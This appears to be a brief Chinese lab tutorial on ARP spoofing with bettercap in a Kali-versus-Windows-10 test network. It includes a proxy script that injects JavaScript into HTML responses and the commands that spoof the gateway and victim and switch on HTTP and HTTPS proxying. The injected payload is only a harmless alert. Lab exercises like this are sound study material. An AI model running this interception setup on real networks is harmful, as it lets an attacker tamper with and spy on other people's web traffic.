0x00 目标
- 模拟arp欺骗,修改靶机IP的http和https返回包。
0x01 测试环境
- 名称IP备注攻击192.168.2.x虚拟机 kali靶机192.168.2.x客户机 win10
0x02 测试步骤
function onResponse(req,res){
if(res.ContentType.indexOf('text/html')==0){
var body=res.ReadBody();
if(body.indexOf('</head>')!=-1){
res.Body=body.replace(
'</head>',
'<script type="text/javascript">alert("your computer has hacked!")</script></head>'
);
}
}
}
- 在kali /home/test 目录下写一个js脚本
- 启动bettercap
- 设置攻击目标
- set arp.spoof.targets 192.168.2.1,192.168.2.181 #设置arp欺骗的目标,这里欺骗的是网关和目标机器set http.proxy.script /home/test/1.js #往http流量中注入脚本set https.proxy.script /home/test/1.js #往https流量中注入脚本http.proxy on #开启HTTP代理https.proxy on #开启HTTPS代理arp.spoof on #开启ARP欺骗
- 靶机访问http,https网站
© 版权声明
THE END
暂无评论内容